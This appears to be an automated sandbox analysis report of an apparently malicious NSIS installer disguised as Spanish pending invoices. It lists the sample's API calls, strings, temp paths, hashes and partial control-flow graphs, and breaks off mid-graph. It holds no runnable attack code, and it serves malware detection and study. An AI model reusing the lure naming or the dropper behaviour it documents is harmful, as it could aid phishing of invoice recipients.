                                • AppendMenuW.USER32(?,00000000,00000001,00000000), ref: 00404DCC
                                • GetWindowRect.USER32(00010432,?), ref: 00404DEA
                                • TrackPopupMenu.USER32(?,00000180,?,?,00000000,?,00000000), ref: 00404E0C
                                • SendMessageW.USER32(00010432,00001073,00000000,?), ref: 00404E3B
                                • OpenClipboard.USER32(00000000), ref: 00404E4B
                                • EmptyClipboard.USER32 ref: 00404E51
                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00404E5D
                                • GlobalLock.KERNEL32(00000000), ref: 00404E6A
                                • SendMessageW.USER32(00010432,00001073,00000000,?), ref: 00404E86
                                • GlobalUnlock.KERNEL32(?), ref: 00404EA9
                                • SetClipboardData.USER32(0000000D,?), ref: 00404EB4
                                • CloseClipboard.USER32 ref: 00404EBA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrcat
                                • String ID:
                                • API String ID: 2901622961-0
                                • Opcode ID: e3a3b5db6e8f7872d6748160a89fdbae3d99834f52d0e9e06fc12283005a9987
                                • Instruction ID: 6359324f75213449b6abc0588f6453f91f7fc730003d35bba9c6bb800d03804c
                                • Opcode Fuzzy Hash: e3a3b5db6e8f7872d6748160a89fdbae3d99834f52d0e9e06fc12283005a9987
                                • Instruction Fuzzy Hash: BEA1C5B1205704BBD320AB25DD49F5B7FADFF88750F01493EF681A62A1CB788841CB69
                                APIs
                                  • Part of subcall function 6FA412F8: GlobalAlloc.KERNEL32(00000040,?,6FA411C4,-000000A0), ref: 6FA41302
                                • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6FA4294E
                                • lstrcpyW.KERNEL32(00000008,?), ref: 6FA429A4
                                • lstrcpyW.KERNEL32(00000808,?), ref: 6FA429AF
                                • GlobalFree.KERNEL32(00000000), ref: 6FA429C0
                                • GlobalFree.KERNEL32(?), ref: 6FA42A44
                                • GlobalFree.KERNEL32(?), ref: 6FA42A4A
                                • GlobalFree.KERNEL32(?), ref: 6FA42A50
                                • GetModuleHandleW.KERNEL32(00000008), ref: 6FA42B1A
                                • LoadLibraryW.KERNEL32(00000008), ref: 6FA42B2B
                                • GetProcAddress.KERNEL32(?,?), ref: 6FA42B82
                                • lstrlenW.KERNEL32(00000808), ref: 6FA42B9D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2366121843.000000006FA41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FA40000, based on PE: true
                                • Associated: 00000000.00000002.2365714477.000000006FA40000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 00000000.00000002.2366165712.000000006FA44000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 00000000.00000002.2366228696.000000006FA46000.00000002.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6fa40000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
                                • String ID:
                                • API String ID: 1042148487-0
                                • Opcode ID: 989da479e244ec37545848fb969006e5ffba73a469fbe80a6b533ce1b6526d7d
                                • Instruction ID: dfcd6b8d679571ef63487924f27dd251ed6b01f4397d291287fa6baea8a6174b
                                • Opcode Fuzzy Hash: 989da479e244ec37545848fb969006e5ffba73a469fbe80a6b533ce1b6526d7d
                                • Instruction Fuzzy Hash: 9642A171A587029FD318CF38C94076AB7E0FF89714F044A2EE5A9D7290E778E5C58B92

                                Control-flow Graph

                                [Graph not reproduced: control-flow graph beginning at block 4066f4-40671d; legend: Executed / Not Executed]
                                APIs
                                  • Part of subcall function 00406613: lstrlenW.KERNEL32(00425A48,00000000,00425A48,00425A48,00000000,?,?,00406716,?,00000000,75923420,?), ref: 00406667
                                  • Part of subcall function 00406613: GetFileAttributesW.KERNELBASE(00425A48,00425A48), ref: 00406678
                                • DeleteFileW.KERNELBASE(?,?,00000000,75923420,?), ref: 00406720
                                • lstrcatW.KERNEL32(00425248,\*.*,00425248,?,00000000,?,00000000,75923420,?), ref: 00406772
                                • lstrcatW.KERNEL32(?,004082B0,?,00425248,?,00000000,?,00000000,75923420,?), ref: 00406793
                                • lstrlenW.KERNEL32(?), ref: 00406796
                                • FindFirstFileW.KERNEL32(00425248,?), ref: 004067AD
                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?), ref: 0040683E
                                • FindClose.KERNEL32(00000000), ref: 00406850
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
                                • String ID: \*.*
                                • API String ID: 2636146433-1173974218
                                • Opcode ID: 0962212a27e10f8c29849c35d287c52ef14dcf59cdd65fcf28beb03e610e8e2c
                                • Instruction ID: ed3bb2814488eceec14de134e67e78f5f853c3bf88eed2e9a0dc8686b927a400
                                • Opcode Fuzzy Hash: 0962212a27e10f8c29849c35d287c52ef14dcf59cdd65fcf28beb03e610e8e2c
                                • Instruction Fuzzy Hash: E841193210671069D7207B399D45A6B76E8DF81318F12453FF883B21D1EB7C8C6686AF
                                APIs
                                • CoCreateInstance.OLE32(004089D0,?,00000001,004089B0,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004023D8
                                Strings
                                • C:\Users\user\AppData\Local\Temp\fanin\Leflet, xrefs: 0040241F
                                • C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll, xrefs: 004024AC
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: CreateInstance
                                • String ID: C:\Users\user\AppData\Local\Temp\fanin\Leflet$C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll
                                • API String ID: 542301482-3537113109
                                • Opcode ID: 792a9dd0bafcf7b136060fe4d29ddbdc1cf7de8d0bbc27437ca0ffbf2965f736
                                • Instruction ID: d428ad0e776067b9467a460b3bd0699ffb91532d5b811a166a6037c041011ccd
                                • Opcode Fuzzy Hash: 792a9dd0bafcf7b136060fe4d29ddbdc1cf7de8d0bbc27437ca0ffbf2965f736
                                • Instruction Fuzzy Hash: CA414A72604341AFC300EFA5C948A2BBBE9FF89314F10092EF695DB291DB79D805CB16
                                APIs
                                • FindFirstFileW.KERNELBASE(00000000,00427648,00000000,00406657,00425A48), ref: 004065B5
                                • FindClose.KERNEL32(00000000), ref: 004065C1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Find$CloseFileFirst
                                • String ID: HvB
                                • API String ID: 2295610775-1619000230
                                • Opcode ID: 1a79fd4cd6ac794e938e769cbdac9cc28720eba36b1ba893e73712489ff4ef95
                                • Instruction ID: d1368554cb410e246732b21b307163ecdbcfd804cd616700c419d461b784c5b9
                                • Opcode Fuzzy Hash: 1a79fd4cd6ac794e938e769cbdac9cc28720eba36b1ba893e73712489ff4ef95
                                • Instruction Fuzzy Hash: 72D0123155A1206FC25057387E0C84B7A999F153717518B36B0A6F11E4C7348C6686AD
                                APIs
                                • ShowWindow.USER32(00000000,00000000), ref: 00402061
                                • EnableWindow.USER32(00000000,00000000), ref: 0040206C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Window$EnableShow
                                • String ID:
                                • API String ID: 1136574915-0
                                • Opcode ID: 52fef71910991febb17206dff6bdae22265bb691ab5af8558c030a970d53b9a7
                                • Instruction ID: 5e1a6dc9ac369cb9fdd6eee03f9e71544f162ca31fdf6318b4aac8087fee14a7
                                • Opcode Fuzzy Hash: 52fef71910991febb17206dff6bdae22265bb691ab5af8558c030a970d53b9a7
                                • Instruction Fuzzy Hash: 30E026726483009FE354AF20E94E96AB768EB40326F20043FF940A40C1CB7D2C41867E

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                [Control-flow graph, entry block 404f6d-404f86]
                                APIs
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FAC
                                • ShowWindow.USER32(?), ref: 00404FD6
                                • GetWindowLongW.USER32(?,000000F0), ref: 00404FE7
                                • ShowWindow.USER32(?,00000004), ref: 00405003
                                • GetDlgItem.USER32(?,00000001), ref: 0040512A
                                • GetDlgItem.USER32(?,00000002), ref: 00405134
                                • SetClassLongW.USER32(?,000000F2,?), ref: 0040514E
                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040519C
                                • GetDlgItem.USER32(?,00000003), ref: 0040524B
                                • ShowWindow.USER32(00000000,?), ref: 00405274
                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405288
                                • KiUserCallbackDispatcher.NTDLL(?), ref: 0040529C
                                • EnableWindow.USER32(?), ref: 004052B4
                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052CB
                                • EnableMenuItem.USER32(00000000), ref: 004052D2
                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004052E3
                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004052FA
                                • lstrlenW.KERNEL32(004211D0,?,004211D0,00000000), ref: 0040532B
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00010432,?,?,?,00000000,?,?), ref: 0040604B
                                • SetWindowTextW.USER32(?,004211D0), ref: 00405343
                                  • Part of subcall function 00401399: MulDiv.KERNEL32(00000011,00007530,00000000), ref: 004013F9
                                  • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                • DestroyWindow.USER32(?,00000000), ref: 0040538B
                                • CreateDialogParamW.USER32(?,?,-00429D20), ref: 004053BF
                                  • Part of subcall function 004054F5: SetDlgItemTextW.USER32(?,?,00000000), ref: 0040550F
                                • GetDlgItem.USER32(?,000003FA), ref: 004053E8
                                • GetWindowRect.USER32(00000000), ref: 004053EF
                                • ScreenToClient.USER32(?,?), ref: 004053FB
                                • SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405414
                                • ShowWindow.USER32(00000008,?,00000000), ref: 00405433
                                  • Part of subcall function 004054C3: SendMessageW.USER32(0001042C,00000000,00000000,00000000), ref: 004054D5
                                • ShowWindow.USER32(?,0000000A), ref: 00405479
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
                                • String ID:
                                • API String ID: 162979904-0
                                • Opcode ID: 2c232c3c4cd4abe9946bd1abf6ab45f170ff85d80f4d9d15ff1c79bd8826187f
                                • Instruction ID: 1b19c71cd4f81cfbd26a1cf5418529817e88c436646d4b9e8708edd60e3e664c
                                • Opcode Fuzzy Hash: 2c232c3c4cd4abe9946bd1abf6ab45f170ff85d80f4d9d15ff1c79bd8826187f
                                • Instruction Fuzzy Hash: C4D1C070601A11AFDB206F21ED48A6B7BA8FB48355F40453EF945B21F0CB399852DFAD

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                [Control-flow graph, entry block 405a19-405a34]
                                APIs
                                  • Part of subcall function 004068C1: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EB,0000000B), ref: 004068CF
                                  • Part of subcall function 004068C1: GetProcAddress.KERNEL32(00000000), ref: 004068EB
                                • lstrcatW.KERNEL32(1033,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000,00000002,00000000,75923420,00000000,75923170), ref: 00405A9C
                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\fanin,1033,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000,00000002,00000000), ref: 00405B20
                                • lstrcmpiW.KERNEL32(-000000FC,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\fanin,1033,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000), ref: 00405B35
                                • GetFileAttributesW.KERNEL32(Call), ref: 00405B40
                                • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\fanin), ref: 00405B89
                                  • Part of subcall function 004065FA: wsprintfW.USER32 ref: 00406607
                                • RegisterClassW.USER32(00428CA0), ref: 00405BCE
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405BE5
                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C1A
                                • ShowWindow.USER32(00000005,00000000), ref: 00405C4C
                                • GetClassInfoW.USER32(00000000,RichEdit20W,00428CA0), ref: 00405C77
                                • GetClassInfoW.USER32(00000000,RichEdit,00428CA0), ref: 00405C84
                                • RegisterClassW.USER32(00428CA0), ref: 00405C91
                                • DialogBoxParamW.USER32(?,00000000,00404F6D,00000000), ref: 00405CAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\fanin$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                • API String ID: 1975747703-790534633
                                • Opcode ID: 7826c34372ab1de799e47c1a445c5beb8b4d289113b4383a7413856266521f1e
                                • Instruction ID: 997547c739dba09290e01480a6769471c967da196cfb38af9b733d4135fa1862
                                • Opcode Fuzzy Hash: 7826c34372ab1de799e47c1a445c5beb8b4d289113b4383a7413856266521f1e
                                • Instruction Fuzzy Hash: 1A610370201601BAE620AB76AD42F2B366CEB04758F51443FF945B62E1DF78AC018B7D

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                [Control-flow graph, entry block 40154a-4015bd]
                                APIs
                                • PostQuitMessage.USER32(00000000), ref: 004015F1
                                • Sleep.KERNEL32(00000001,?,00000000,00000000), ref: 00401628
                                • SetForegroundWindow.USER32 ref: 00401634
                                • ShowWindow.USER32(00010438,00000000,?,?,00000000,00000000), ref: 004016D3
                                • ShowWindow.USER32(00010432,?,?,?,00000000,00000000), ref: 004016E8
                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0,?,?,00000000,00000000), ref: 004016FB
                                • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0,?,?,00000000,00000000), ref: 0040176A
                                • SetCurrentDirectoryW.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\fanin\Leflet,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll), ref: 004017A3
                                • MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
                                • GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,?,00000000,00000000), ref: 00401843
                                • GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\fanin\Leflet,00000000,00000000,00000031,00000000,00000000,000000EF,?,?,00000000,00000000), ref: 00401920
                                • CompareFileTime.KERNEL32(-00000014,00000000,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\fanin\Leflet,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
                                • SetFileTime.KERNELBASE(00000000,000000FF,00000000,000000FF,?,00000000,00000000,00000000,000000EA,00000000,Call,40000000,00000001,Call,00000000), ref: 00401A5A
                                • CloseHandle.KERNELBASE(00000000), ref: 00401A61
                                • lstrcatW.KERNEL32(Call,00000000,Call,000000E9), ref: 00401A82
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
                                • String ID: C:\Users\user\AppData\Local\Temp\fanin\Leflet$C:\Users\user\AppData\Local\Temp\nscDCA5.tmp$C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll$Call

                                Control-flow Graph: first node 568 (4033c8-403415); graph image not preserved
                                APIs
                                • GetTickCount.KERNEL32 ref: 004033DB
                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,00000400,?,?,?,?,?), ref: 004033F7
                                  • Part of subcall function 004068F6: GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,80000000,00000003,?,?,?,?,?), ref: 004068FA
                                  • Part of subcall function 004068F6: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040691A
                                • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,80000000,00000003,?,?,?,?,?), ref: 00403441
                                • GlobalAlloc.KERNELBASE(00000040,?,?,?,?,?,?), ref: 0040359B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                • String ID: C:\Users\user\Desktop$C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft

                                Control-flow Graph: first node 632 (405e95-405e9e); graph image not preserved
                                APIs
                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405FBF
                                  • Part of subcall function 00406AF5: lstrcpynW.KERNEL32(?,?,00000400,0040384C,Tolkningen Setup,NSIS Error), ref: 00406B02
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406D8D
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DA1
                                  • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DB9
                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00010432,?,?,?,00000000,?,?), ref: 00405FD2
                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00010432,?,?,?,00000000,?,?), ref: 0040604B
                                • lstrlenW.KERNEL32(Call,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00010432,?,?,?,00000000,?,?), ref: 004060A5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
                                • String ID: >5^$Call$Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch

                                Control-flow Graph: first node 983 (405d15-405d21); graph image not preserved
                                APIs
                                • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00000000,?,?), ref: 00405D47
                                • lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00000000,?,?), ref: 00405D59
                                • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00000000,?,?), ref: 00405D74
                                • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll), ref: 00405D8C
                                • SendMessageW.USER32(00010432), ref: 00405DB3
                                • SendMessageW.USER32(00010432,0000104D,00000000,?), ref: 00405DCE
                                • SendMessageW.USER32(00010432,00001013,00000000,00000000), ref: 00405DDB
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00010432,?,?,?,00000000,?,?), ref: 0040604B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: MessageSend$lstrcatlstrlen$TextWindow
                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll

                                Control-flow Graph: first node 999 (40291d-402934); graph image not preserved
                                APIs
                                • ReadFile.KERNELBASE(00000000,?,?,?), ref: 00402994
                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004029D4
                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A07
                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,00000001,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A1F
                                • SetFilePointer.KERNEL32(?,?,?,00000001,00000000,?,00000002), ref: 00402ADC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: File$ByteCharMultiPointerWide$Read
                                • String ID: 9

                                Control-flow Graph: first node 1044 (406179-406199); graph image not preserved
                                APIs
                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406190
                                • wsprintfW.USER32 ref: 004061CC
                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                • String ID: %s%S.dll$UXTHEME$\

                                Control-flow Graph: first node 1051 (406a31-406a3d); graph image not preserved
                                APIs
                                • GetTickCount.KERNEL32 ref: 00406A4D
                                • GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403CAF,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406A68
                                Strings
                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A3A
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406A36
                                • a, xrefs: 00406A46
                                • n, xrefs: 00406A3F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: CountFileNameTempTick
                                • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
                                • API String ID: 1716503409-1137806429

                                Control-flow Graph

                                control_flow_graph 1057 403148-403181 1058 403190-4031a4 call 406923 1057->1058 1059 403183-40318b call 403131 1057->1059 1063 403354 1058->1063 1064 4031aa-4031b0 1058->1064 1059->1058 1065 403356 1063->1065 1066 4032f6-4032f8 1064->1066 1067 4031b6-4031dd GetTickCount call 407c4f 1064->1067 1068 403357-403361 1065->1068 1069 4032fa-4032fc 1066->1069 1070 40333d-403352 call 40311b 1066->1070 1073 4032ee-4032f0 1067->1073 1078 4031e3-4031fa call 40311b 1067->1078 1069->1073 1074 4032fe 1069->1074 1070->1063 1070->1073 1073->1068 1077 403303-403313 call 40311b 1074->1077 1077->1063 1084 403315-403325 call 4069e6 1077->1084 1078->1063 1083 403200-40320e 1078->1083 1085 403218-403234 call 406e83 1083->1085 1089 403327-403335 1084->1089 1090 403339-40333b 1084->1090 1093 4032f2-4032f4 1085->1093 1094 40323a-40325a GetTickCount 1085->1094 1089->1077 1092 403337 1089->1092 1090->1065 1092->1073 1093->1065 1095 4032a7-4032ad 1094->1095 1096 40325c-403265 1094->1096 1099 4032e6-4032e8 1095->1099 1100 4032af-4032b1 1095->1100 1097 403267-403269 1096->1097 1098 40326b-4032a3 MulDiv wsprintfW call 405d15 1096->1098 1097->1095 1097->1098 1098->1095 1099->1073 1099->1078 1102 4032b3-4032bc call 4069e6 1100->1102 1103 4032cb-4032d3 1100->1103 1108 